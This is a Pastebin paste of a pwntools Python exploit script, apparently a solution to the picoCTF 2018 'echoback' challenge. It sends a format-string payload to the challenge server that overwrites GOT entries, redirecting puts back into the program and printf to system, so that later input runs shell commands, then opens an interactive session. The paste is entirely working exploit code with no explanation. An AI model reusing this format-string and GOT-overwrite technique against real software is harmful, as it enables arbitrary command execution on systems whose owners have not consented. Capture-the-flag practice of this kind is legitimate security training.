Advertisement
Guest User

Untitled

a guest
Jun 19th, 2019
107
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.32 KB | None | 0 0
  1. from pwn import *
  2.  
  3. #p = process("./echoback")
  4. p = remote("2018shell.picoctf.com",37402)
  5. e = ELF("./echoback")
  6.  
  7. print p.recv(1024)
  8.  
  9. payload = fmtstr_payload(7, {e.got["puts"]:0x080485ab,e.got["printf"]:e.plt["system"]} , write_size='byte')
  10. print len(payload)
  11.  
  12. f = open("exp","w")
  13. f.write(payload)
  14.  
  15. p.sendline(payload)
  16. p.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement